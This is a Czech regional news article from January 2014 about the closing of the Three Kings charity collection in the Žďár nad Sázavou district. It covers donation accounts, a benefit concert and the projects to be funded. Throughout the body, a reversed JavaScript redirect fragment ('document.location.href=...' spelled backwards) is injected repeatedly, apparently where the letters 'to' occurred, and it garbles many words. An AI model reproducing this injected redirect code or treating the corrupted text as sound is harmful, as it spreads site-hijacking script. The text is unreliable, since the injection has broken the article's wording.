Žďár nad Sázavou, zdar nad sazavou, aktuality, tříkrálová sbírka, charita
Rainbow page separator

Tři králové dnes vyrazili naposledy

Úterý, 14. ledna 2014

Tříkrálová sbírka le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku dnešním dnem končí. Všech 436 kasiček, které byly postupně předány všem sedmdesáti asistentům celého okresu Žďár nad Sázavou, je postupně rozpečeťováno a za dohledu představitelů jednotlivých měst a obcí jsou výtěžky předávány na centrální účet Charity Česká republika, kde budou následně rozděleny dle variabilních symbolů příslušným charitám. Celková částka výtěžku, kterou vykoledovalo 1 600 králů na území působení žďárské Charity, není pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ještě dosud známa. Její aktuální stav je však možné sledovat v záhlaví webu Oblastní charity Žďár nad Sázavou www.zdar.charita.cz
„Lidé, kteří se během uplynulých čtrnácti dnů nesetkali s koledníky, a neměli tak možnost podpořit dobrou věc, mohou finanční obnos vložit na účet Oblastní charity Žďár nad Sázavou, který má následující číselnou kombinaci 66008822/0800. Důležité je také vyplnit variabilní symbol 777 a symbol specifický 6800 pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, aby částka směřovala právě na podporu žďárské oblasti,“ vysvětluje jedna z koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torek Tříkrálové sbírky Veronika Dobrovolná.

O víkendu se uskutečnil již osmý ročník Tříkrálového koncertu v Novém Městě na Moravě. Koledníkům i dárcům zpříjemnila nedělní odpoledne dvě hudební uskupení, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to žďárský komorní soubor C-VOX a Orchestr Něhoslava Kyjovského z Bystřice nad Pernštejnem. Pěkný kulturní zážitek byl zpestřen předáváním pomyslného královského žezla stávající koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torkou sbírky Michaelou Kuch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou nové koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torce Veronice Dobrovolné.

V roce 2014 by výtěžek Tříkrálové sbírky v Oblastní charitě Žďár nad Sázavou mohl podpořit ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to projekty:
• Osobní asistence
• Sociálně aktivizační služby
• Mezinárodní pomoc
• Krizový fond
• Charitní ošetřovatelskou službu
• Nízkoprahová zařízení pro děti a mládež
• Denní stacionář v Bystřici nad Pernštejnem
• Dobrovolnické centrum Kambala

O konkrétní výši podpory projektů se bude rozhodovat během roku podle finanční situace a potřebnosti.
Lenka Šustrová